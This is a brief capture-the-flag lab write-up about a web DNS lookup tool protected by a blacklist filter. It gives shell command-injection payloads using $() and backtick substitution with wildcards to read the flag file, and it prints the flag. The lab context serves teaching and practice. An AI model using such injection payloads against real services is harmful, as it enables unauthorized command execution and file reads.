Simple Web 0x10(Lab - DNS Lookup Tool | WAF)
tags: NTUSTWS CTF Web
Background
Source code
:::spoiler code
1 |
|
::: It set some protection such as blacklist.
Exploit
Use $ or ` string to bypass blacklist
- Payload:
1
2'$(cat /fla*)' '`cat /fl\*g\*`'
Flag: FLAG{Y0U_$(Byp4ssed)_th3_`waf`}